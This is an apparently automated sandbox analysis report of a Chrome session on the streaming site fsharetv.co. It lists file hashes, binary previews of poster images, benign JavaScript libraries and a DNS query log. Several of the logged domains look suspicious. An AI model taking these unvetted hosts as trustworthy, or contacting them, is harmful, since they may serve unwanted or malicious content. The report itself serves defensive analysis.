                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BODE3YWNkZGQtZGZjNy00NDZlLWI1MzAtZWUzYTgwM2NiZjA2XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................w.;qx.......r.|..|.P@..........Rt..ZR..H...<..=..t..%..x0+%..5.P.I..Yb]N.E.T...Po.@.........C.,.....`....q..QL.]..\)*..4....w..^i..6.V..#........... .l.... ..k0m.......k*#.....J...=\.R. .w\%...a.8.O.K.urVb.2z....5......o.y.I."B.Q.u..s/..+.....^U......e.....x.m.Cz$S.0...c4.L._....d.3....0B. .".....oK.......j|...S....m.9t.R.....V\....*...i1F.(......@.a P#.e{......W...s..d.:.,.."..7q.....`....N.2.V.D..\vv..9.|.....H.7...*..W.>.....S..4....IR`./.{9..j6......*.t-W...jb.. 7..\..nux..7E.'(.Ks...{.B.<..;K.?.;0p.....u.N..\=.=.F....6)../{.x./..j-h[!.-.)5...'.n5....x...ut.F..\..{..<...>{..[1....u.....3=..K}./..A.......24n^.?.....7....K.o..2i..<.^V.G..E.,.}|..G>=.Vx..D.".139.g.|..a.g.o..Tml.3....(.t.D.)..D.7..\..n.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x447, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):37893
                                                                                                                                                                                          Entropy (8bit):7.976347465959478
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:5SwJc7YHc+v4wCZ2T9BH4+zJZZD8oLRODS6HghUkMzOpxDQPzrwQCIkZyj:5Rc7tw+2T9FbfZYoLRitAhwypWPzrwIf
                                                                                                                                                                                          MD5:537BB146EBCBB7C8F4506EE6E9FC798A
                                                                                                                                                                                          SHA1:21A7741D1FF274C5A87736CD524075D7D460ED65
                                                                                                                                                                                          SHA-256:9D4CEC301DB7B23476B98655A2FFB3F74A69E04A110117776EB9C08D543AA1C7
                                                                                                                                                                                          SHA-512:E18661F2B5ADEF78FF99CF2F68696B425259D206E31AFBC3EF6D20F3277F3A0B56919C1601B98F5A9083016A278F0AC6427161C60F4F58B6DF202382881859CA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4................................................................/X_...zP.g.^.`..R.0..I.q.;.?....q..%=.....C.....,%.Z.{".jA..f...l....LcT...Y<.m..>d...v*.i./...K_./7...J#.C..H.....:.g"3...MK.+.\.K.CK.VM.HGqz...Dj...o.27e.e..l[..dwz...1.N.EK#..+..V..yR...;....1.?........./lp..Z....,h.L.H.A.,fm..j.f-.tA..u..aW.%......I$...Y.....g..@$v6..7.,Q,$.....n.[..Q..=..}...rDg.k.....$.o..4@.).........6......UO*...j.q....I.y~..W...Z.f.iA7.....:C....e.W..S..p>.C.].....)sQ:.........e.g+T..v.....n].p...I.H..a....F}.|....n~.N5:~_..rg...t.5f:7).k....S.J..(=.#....'1.V5X.).fQ.VK.......N.L`.roT..Y2.HD.....C....'..H..L.Y..y...Lt.[..=....n9...1....v0.G..h.i5.It...,...y.c.....Y.+....c...F.Y.El0%y.!:...xGm...)h.\......st]l...8q1..3[..Ms....]:..*..-tA{x\v.&v$..2.1h.....Z..s.S(`.e.#..us^A/........+8l....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (47842)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):72095
                                                                                                                                                                                          Entropy (8bit):5.316448247603051
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:oLMbH5Dw1DB9VEtWPbmwzzVmwx96ISZbliAuWgCs2tjOrkUh/kHkOcLhv+gmXqOL:ow21lEMPLRoqyNKUc/IyxVv9XQzQYSBq
                                                                                                                                                                                          MD5:C230232E68A10BA52BA872C3695A2A08
                                                                                                                                                                                          SHA1:3F81B8B87F5FA06EE223EC1627D434944B060362
                                                                                                                                                                                          SHA-256:F2195A38A669D5AE41085E14E5260444B12685EAF30F154775DC757554CAB7E5
                                                                                                                                                                                          SHA-512:702D37D5A312B8A888287F281301664B7400EE4E893FE14AD2300E58E9377A7DCED78C18AA9FF3F08E824C633DFC07529916AF93FFFC7B5A7955923553455A75
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://cdn.jsdelivr.net/npm/sweetalert2@11
                                                                                                                                                                                          Preview:/*!.* sweetalert2 v11.15.0.* Released under the MIT License..*/.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Sweetalert2=t()}(this,(function(){"use strict";function e(e,t,n){if("function"==typeof e?e===t:e.has(t))return arguments.length<3?t:n;throw new TypeError("Private element is not present on this object")}function t(t,n){return t.get(e(t,n))}function n(e,t,n){(function(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")})(e,t),t.set(e,n)}const o={},i=e=>new Promise((t=>{if(!e)return t();const n=window.scrollX,i=window.scrollY;o.restoreFocusTimeout=setTimeout((()=>{o.previousActiveElement instanceof HTMLElement?(o.previousActiveElement.focus(),o.previousActiveElement=null):document.body&&document.body.focus(),t()}),100),window.scrollTo(n,i)})),s="swal2-",r=["container","shown","height-auto"
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x445, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):12629
                                                                                                                                                                                          Entropy (8bit):7.953966012201562
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:NXzle6ClCGqgB++jAwlqbDosLzRLGAt8/cRU:tAFCQB++MKsLzFVt8MU
                                                                                                                                                                                          MD5:4ADDF28359539521D79CCF832F168A1A
                                                                                                                                                                                          SHA1:5310BAF8B5C42B17281C3D57592EBA6A933F1283
                                                                                                                                                                                          SHA-256:263ACB6764E37DCB94A1A96F2993A1457A12AACFEBC6641639B09EDDD838B388
                                                                                                                                                                                          SHA-512:0695FAAFDAD2DEC1BBEB0233C8D35D23F41C85CFC897FA5D8DE668FC673A1AA8B08A0EB9BDAF8E8F0EC3E06BE0C964CCE24A409F0340233BEBA468D9AEDC7BE9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........3................................................................[.=Id.m.9.D.1.@F.l99... S.F.m.80a...D..8Y..a...D.`MT.B.}...aJ... xCF21.fl.<.$....+.`....F............Y.A....E0........$@....).q.2...............a.UP..`.A.....K..t....e^ .6N.1...K.FNc.6.&=....0.....d`...".*.8... ..@.....<0.RA.'.....X.$.X1...uk.9....sw.8p..aa...UC.(a.U. ..@aa....)..$j..Ha20.b.dr.p.VO....@o...?,.l".!8.*..%+..dD:. ....fT....A.H.]D.WV6U..j...2.J',`d..S..?5...X._.$U'a..@.Tl.N...J...N.:.W..[8..I....-.,..6UQ4...F.6.Y...I..n...sR.Y.M.aT..%....b.V5.qT.Q...!......r..M*.aJ..l.,3...$`...J}.Fe..:..r..B".D... ...5]E.Z...p..0..x84..[;-.R...*....L..S.,...l.......xD.2Yk.A..dh..v.gX...lh.5.011mK.....N..t.X-..a......z.m8..ZR..".:.'..T.....SeUJ.av...X...Br........1.t.3.2..(f./Le..E...6.'v.t..Vm...mUv.E....&......XUR.7)-...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (12836)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13097
                                                                                                                                                                                          Entropy (8bit):5.1521059561503115
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:b6+WaCyZKFGC+BFOCvyV/W1yBjKZsJDmv:pFZmx+I/EyZov
                                                                                                                                                                                          MD5:98124B34236766B0DA6E5F1F1A9CC740
                                                                                                                                                                                          SHA1:52DE6837FA54D27C4D393C4BB6A19A4D981765E5
                                                                                                                                                                                          SHA-256:04DA6EDEE2E40774B06376B61F751EED653AF5015D491949541AC34E754A8E20
                                                                                                                                                                                          SHA-512:BB10B01DFD69470049BD4440303FC68342B3D85D81CA64325C3953AA76B2B91C81144EDC8AC1428767526F51C8BA6642447B998A481EA979BCAEE5286B1939B4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:/**.* Ajax Autocomplete for jQuery, version 1.4.11.* (c) 2017 Tomas Kirda.*.* Ajax Autocomplete for jQuery is freely distributable under the terms of an MIT-style license..* For details, see the web site: https://github.com/devbridge/jQuery-Autocomplete.*/.!function(a){"use strict";"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports&&"function"==typeof require?require("jquery"):jQuery)}(function(a){"use strict";function b(c,d){var e=this;e.element=c,e.el=a(c),e.suggestions=[],e.badQueries=[],e.selectedIndex=-1,e.currentValue=e.element.value,e.timeoutId=null,e.cachedResponse={},e.onChangeTimeout=null,e.onChange=null,e.isLocal=!1,e.suggestionsContainer=null,e.noSuggestionsContainer=null,e.options=a.extend(!0,{},b.defaults,d),e.classes={selected:"autocomplete-selected",suggestion:"autocomplete-suggestion"},e.hint=null,e.hintValue="",e.selection=null,e.initialize(),e.setOptions(d)}function c(a,b,c){return a.value.toLowerCase().indexOf(c)!==-1}function
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x403, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):27912
                                                                                                                                                                                          Entropy (8bit):7.97930443375517
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:5DZLWSjuBH7ZptYrzNwgwdjvzBLBpzU0IcjVFNxKrXPJC5EiDVMMk8XeLs96P6cO:zRjs7ZpmhwlvzXlUYVrxUXBwFBn9S6cO
                                                                                                                                                                                          MD5:EF986115130BAD0586FE7636D0AE9FBE
                                                                                                                                                                                          SHA1:A85EAF4928C885CFE920E482879A2DE0F87E9C60
                                                                                                                                                                                          SHA-256:D08E11419ED328EA6FD8813DE385E23D3F08580B266D51FA87FFC11AE0817F44
                                                                                                                                                                                          SHA-512:59E5627648C1C8469226543004034D719CE1DD46A57D105F03B25A84C4F485CB120916711580FE6BC2341DC89F3E9FE348EF986A00943BBE5E9D2D252A15FD58
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BOTMxNDVmNTQtNWQ5My00MjE0LWE2MzAtOTVlNzg5OWFmOTQ4XkEyXkFqcGdeQXVyMTQ3Njg3MQ@@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................^..,...9.Y:3.u1n.u...z...)+5..XH..[f...jt^...K...1.....#%..ct....r.#.K.bX.I...:.H#...;a...*..E+.....5...ns..W.D&p.$....f..m.e.(...^.k.....~Rt.).h./...S..od%."O......./VJ.*x.1.....:U.......Kq.=9:X..j]1..l.......k-.v./f..;(.T>-0....X............G...b...%"ZC.u..A..$......rlu......>..|......(...7..W..S.\...*...L..4YC......S.Z.md....eQtr.I.S,0..K...x..\[.....N2...I.F...........^0m.......#.I..q.i.. ...F2..{..4GQ._......H.2I(.&...[..%../..3.3...p0.x`.......=..q.y...8>.g..a@<..eI.<6.z..;.Q.."..y.i.yzu.$@.....J.....)VF........j...F..{:5.....%.6..-....s_..[7)[\c.J.O.m........j..@r}+.-{.vx.'.......j5=K...+..rZ....>...Dyu..8....FE.,..w;...).^.....).?f&.}&.H.H..Q..6#.j....tUzQ7. C....:.k...!r...(g....W....A
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x443, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):38902
                                                                                                                                                                                          Entropy (8bit):7.977826271516952
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:8tudKap+TtRSDlhWTu+FGcNx9okE/h3OXzf7F13u:5KaQTfSDvWT/gcN8kzXzf7FI
                                                                                                                                                                                          MD5:5E45B588ED59E98B6E90E1893ABD15D9
                                                                                                                                                                                          SHA1:51504D1B25C07E736EE315C0C8C4DE88EC761757
                                                                                                                                                                                          SHA-256:C6CBAAE203CDF5319634BCA058DBB630325F7AE41ED7FBF627C488147D9A0701
                                                                                                                                                                                          SHA-512:8FEA486C718A5CD8AEB7125988AA66A77F845E3C11A29D9B5E93FA435259FA52BD7A68364E7E260910E0A574D80C1566DB2E15207DF6D4211AAC85A63744C335
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................~..unQz_..V.....+l..|.?..._.s ....K.......R...D..k. ~.......a....*y.7..C....w*....%6g.@...5..7..z.>.[-.7ib../Shu....jNo/.2...A%I...A.Lc..i.W.,..w....}P.=............j]&*.l7E.6.x...},.}....>./e7.....8..x.{bY.....~.8$...B..\.C7.}UH..4...P...^E..Mw.....M/.b...z...........{.@.fU*8..R.V.....$8.q^@..z.5...."..]\...Y:..p\..i@.d...........`....{.YfYKoY.z.=....F.9p}.4.|.O.V.w&.%...........l.X*.].W7.8..*/..a...%.}i.i..}g.n..y.S...'.zD....O.L.5+%..CvK........R............N8^..eE..Lk.....OG,r;y...Dk..:Y8.JD...q..1_vn...t1d/..M.4...q.'[...{..[D6.....![R...-....{K.VU....m..W.wO.d.(m~...1.k..~..C...y..%.mw.y.1..zQ.u..QsM5O...rW.m......3.,...B@[J..Y.nN..jT.....Y.'1&...Ny..H`E.{...|......[...y.@Su..q.H../...d*[......
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x453, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25232
                                                                                                                                                                                          Entropy (8bit):7.9656570600340695
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:um/q75gRvY2A6U+wJ8cfvxyUgLe7P9dMgrxG9g:uIq78vYUwz3gS7lCgrxG9g
                                                                                                                                                                                          MD5:967F60095A618B9109C25850EEAE51A0
                                                                                                                                                                                          SHA1:8A267B004942ACB04AF511A8D89AD3AC77EF7FE0
                                                                                                                                                                                          SHA-256:496D7822128D18D28B45DD9CEFF1726C6C944D18BD0D5FF47AC826399CF0F8AF
                                                                                                                                                                                          SHA-512:C520130C5F223A157434E9ACC0391E83BEFAE95FCC039B3E34F9B0F1B1F0585B41BD79782D7E1E7039CA7353BCA95DA073A63FF9094DAF106C3D93370F8D1316
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................+.~...~ge.....d.c\.l.X..J..r..[0...d...F@-:.L.y.Ov.]VWu.......v.......s;k.t..w...>..U;ct....c.F].L..G.j..R.u......D.e.F...R.{iF.....j.S-.^....f)8.L.I.....u..z.a.yU.x ...:.7&..:~..}...u.*.....a.X.M..DmaGumdhR6Z.G2...R.......D.b.~... ....j*..`9..+.=g..`.....r..g..* *.E..`..Jn'......Uj..*...../.../.C/.Q...&t...*.....&.K.......v.....^.^._.._..#.~-.ph...1?.X.aM.Tw;r..}7.}().....(....W....<].@.Gd....( .x..,..b8...b..Y...s.OMy.._7.'.....j.\o....(w.aS...w......Z..P@....g......\.d..'d.1y..<.....9."y.{?C.........w..p....t.........E.*....*..}....w.+....6.....EWs...Jy...;..O7_"q..Z#....SO.{......Oq...@.(.*.E..SG.G .2......<.y....>....Nv....7.?..UZ.^..[......U..Z..-v..E.J..Si..k.l<?..`"f.@p..A.4.O.=..U...G....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x419, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):25107
                                                                                                                                                                                          Entropy (8bit):7.975739417448378
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:mPZKaAYQfR80TQI2NUABUod3owyHjdTMp3BLm9c4C2l8Tr:PIQfm1HymYrdT63ShC2l8n
                                                                                                                                                                                          MD5:AE718CF811C83FAAA73C6577F902DE3A
                                                                                                                                                                                          SHA1:6B4628B681620A79D044A43A94FADB29303C92DE
                                                                                                                                                                                          SHA-256:8BF183294CC697E064FDC47A326E6619680D8F98D34FC16B35A632859553BAEA
                                                                                                                                                                                          SHA-512:0B94C0B39FADD67634C1188B4D574BEA53D82B23D95FDDF99489DBB7EA39D6604FEA4CCCA341F69C15CE8DFC74A193554644B3DFD107E9EE2D1FEF5B175A78E4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMTQ3NjU1NjU1Ml5BMl5BanBnXkFtZTcwODIxNzYxMQ@@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........3.................................................................g.\....JU.0...|..E.....~m..rt.S!D..8e!@.%.xJR.N.F5h.#..T.7al...........6.M...43.Uouq..V...].jV^..y...6.._..~~......e..`....2.$....w...s.ta@..5..y.......h....qy^[......0..PQQ....|.ZK(..'.>i...6.X.0..+...\......l.~....'j .......|.../s=,...=...pz...V..c..P.O...m..:N...v....mo._DH.......l....3.|.K.?.....N.}.V=x.o.7;..4.).7..v...q.{.k.`).^.~....}i)/NM.yvq..|..wg.A...k..Z..a)....2s..C\.Gm.\....].6..;V...<...+...6.!P=..K:k.N.....rl..)..y...-.n...;.u..Kj0.._..9..8~S.....+.....tM.!...J..9{n.8...py..z..G.....f.j....9i......4....9.s-.W..Chk.m..}\_l.H...S.>*...e.s:o...N.h&..|.F.........a...D.\.E......q..g......MWv.U....[...x....#8.o......U..St...{.%z..C..z,R..O..z.Y.p.?.......l.....?o..c]cu..k%^Ql..zou.l.c..-.
                                                                                                                                                                                          No static file info
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 15, 2024 12:37:47.675111055 CET192.168.2.161.1.1.10x6eb8Standard query (0)fsharetv.coA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:47.675591946 CET192.168.2.161.1.1.10x5abdStandard query (0)fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.267205954 CET192.168.2.161.1.1.10xeaebStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.267366886 CET192.168.2.161.1.1.10xb944Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.371543884 CET192.168.2.161.1.1.10x9c6cStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.371731997 CET192.168.2.161.1.1.10xf8d9Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.573626041 CET192.168.2.161.1.1.10xad87Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:51.573885918 CET192.168.2.161.1.1.10x860fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.396378994 CET192.168.2.161.1.1.10x834fStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.396514893 CET192.168.2.161.1.1.10x7a8Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.397097111 CET192.168.2.161.1.1.10x511dStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.397217035 CET192.168.2.161.1.1.10xb09fStandard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.562289000 CET192.168.2.161.1.1.10xbe74Standard query (0)d2w9cdu84xc4eq.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:53.562551022 CET192.168.2.161.1.1.10xcfc3Standard query (0)d2w9cdu84xc4eq.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:54.164366961 CET192.168.2.161.1.1.10xe86cStandard query (0)fsharetv.coA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:54.164917946 CET192.168.2.161.1.1.10xc47eStandard query (0)fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.362291098 CET192.168.2.161.1.1.10x8234Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.362412930 CET192.168.2.161.1.1.10x77efStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.673479080 CET192.168.2.161.1.1.10xd47Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:55.675256968 CET192.168.2.161.1.1.10x82efStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.847839117 CET192.168.2.161.1.1.10x5783Standard query (0)d2w9cdu84xc4eq.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.848335028 CET192.168.2.161.1.1.10xfc71Standard query (0)d2w9cdu84xc4eq.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.856750011 CET192.168.2.161.1.1.10xafa8Standard query (0)ukankingwithea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.856750011 CET192.168.2.161.1.1.10x2984Standard query (0)ukankingwithea.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.864155054 CET192.168.2.161.1.1.10xb1b2Standard query (0)getrunkhomuto.info65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.864155054 CET192.168.2.161.1.1.10x33b7Standard query (0)getrunkhomuto.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.865267992 CET192.168.2.161.1.1.10x6c3aStandard query (0)bineukdwithme.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.865267992 CET192.168.2.161.1.1.10x1e61Standard query (0)bineukdwithme.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.865983963 CET192.168.2.161.1.1.10x8be3Standard query (0)ghabovethec.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.866302013 CET192.168.2.161.1.1.10x33a2Standard query (0)ghabovethec.info65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.875859976 CET192.168.2.161.1.1.10xc508Standard query (0)arketingefifortw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:57.875859976 CET192.168.2.161.1.1.10x8449Standard query (0)arketingefifortw.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:59.261579990 CET192.168.2.161.1.1.10x7e67Standard query (0)images.fsharetv.coA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:37:59.261635065 CET192.168.2.161.1.1.10x6859Standard query (0)images.fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.358139038 CET192.168.2.161.1.1.10x4546Standard query (0)d2w9cdu84xc4eq.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:00.358222961 CET192.168.2.161.1.1.10x6643Standard query (0)d2w9cdu84xc4eq.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:02.537545919 CET192.168.2.161.1.1.10xd13cStandard query (0)images.fsharetv.coA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:02.537733078 CET192.168.2.161.1.1.10xd995Standard query (0)images.fsharetv.co65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:05.725322962 CET192.168.2.161.1.1.10x30ceStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:05.725476027 CET192.168.2.161.1.1.10x4876Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.388118982 CET192.168.2.161.1.1.10x1f31Standard query (0)arketingefifortw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:09.388237000 CET192.168.2.161.1.1.10xa1b0Standard query (0)arketingefifortw.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.145622015 CET192.168.2.161.1.1.10x49feStandard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.145724058 CET192.168.2.161.1.1.10x5819Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.217865944 CET192.168.2.161.1.1.10x2f8bStandard query (0)getrunkhomuto.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:12.217972040 CET192.168.2.161.1.1.10xb518Standard query (0)getrunkhomuto.info65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.071870089 CET192.168.2.161.1.1.10x7a91Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:13.072144032 CET192.168.2.161.1.1.10x3ceaStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.806791067 CET192.168.2.161.1.1.10xf936Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:14.807055950 CET192.168.2.161.1.1.10xbc3bStandard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.577126980 CET192.168.2.161.1.1.10x768Standard query (0)lgzmq.employmehnt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:15.577263117 CET192.168.2.161.1.1.10x7c61Standard query (0)lgzmq.employmehnt.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:16.184884071 CET192.168.2.161.1.1.10x50d3Standard query (0)bineukdwithme.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:16.185075045 CET192.168.2.161.1.1.10x17a4Standard query (0)bineukdwithme.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.148267031 CET192.168.2.161.1.1.10x5835Standard query (0)lgzmq.employmehnt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.148724079 CET192.168.2.161.1.1.10xdde8Standard query (0)lgzmq.employmehnt.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.712763071 CET192.168.2.161.1.1.10xef11Standard query (0)ukankingwithea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:20.712878942 CET192.168.2.161.1.1.10x329cStandard query (0)ukankingwithea.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.850418091 CET192.168.2.161.1.1.10x2837Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:21.851726055 CET192.168.2.161.1.1.10xc0ccStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                          Dec 15, 2024 12:38:33.592885971 CET192.168.2.161.1.1.10xbdbStandard query (0)birthjeans.icuA (IP address)IN (0x0001)false
